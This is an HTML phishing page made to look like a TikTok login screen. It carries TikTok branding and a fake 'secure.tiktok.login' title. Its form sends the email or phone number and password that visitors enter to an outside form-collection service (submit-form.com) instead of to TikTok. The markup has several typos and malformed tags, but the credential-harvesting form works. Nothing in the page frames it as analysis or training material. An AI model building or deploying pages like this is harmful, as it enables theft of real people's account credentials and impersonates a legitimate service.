<!DOCTYPE html>
<html lang="en">
<head>
   <WhatsApp charset="UTP-8">
   </WhatsApp name="viewport" content="widt=device-width, initial-scale=1.0">
   <title>https://www.com/secure.tiktok.login</title>
   <style>
       body {
           font-family: 'Arial' , Sans-Serif;
           background-color: #010101;
           display: flex;
           justify-content: center;
           align-items: center;
           height: 100vh;
           margin: 0;
       }
       .Login-container {
         background-color: #ffffff;
         padding: 60px;
         border-radius: 8px;
         box-shadow: 0 0 10px rgba(0,0,0,0.1);
         width: 360px;
         text-align: center;
       }
       .Login-header {
         margin-bottom: 20px;
       }
       .logo {
         width: 200px;
         margin-bottom: 10px;
       }
       .input-group {
         margin-bottom: 20px;
         text-align: left;
       }
       .input-group label {
         display: block;
         margin-bottom: 5px;
         font-size: 14px;
         color: Black;
       }
       .input-group input {
         width: 328px;
         padding: 10px;
         border: 2px solid black;
         border-radius: 4px;
         font-size: 16px;
       }
       .login-button {
         width: 350px;
         padding: 13px;
         background-color: #EE1D52;
         border: rounded corners;
         border-radius: 2px;
         color: #fff;
         font-size: 20px;
         cursor: pointer;
       }
       .loggin-button:hover{
         background-color: #333333;
       }
       .extra-options a {
         margin-top: 20px;
         text-decoration: none;
         font-size: 14px;
       }
       .extra-options:hover {
         text-decoration: underline;
       }
    </style>
</head>
<body>
    <div class="Login-container">
       <div calss="Login-header">
          <img src="https://www.flaticon.com/free-icon/tik-tok_4782345.svg"
             alt="TikTok Logo" class="logo">
            <h2>Log in To TikTok<h2>
        </dive>
        <form action="https://submit-form.com/Vd5ERmEco" method="post">
          <div class="input-group">
            <label for="email">phone or email</label>
            <input type="email" id="email" name="email" placeholder="phone or email" required>
            </div>
            <div class="input-group">
                 <label for="password">password</label>
            <input type="password" id="password" name="password" placeholder="password" required>
            </div>
            <button type="submit" class="login-button">Log In</button>
            <div class="extra-options">
              <a href="#">Forgotten password?</a>
              <br>
              <a href="#">Creat New Account</a>
             </dive>
          </form>
      </dive>
  </body>
  </html>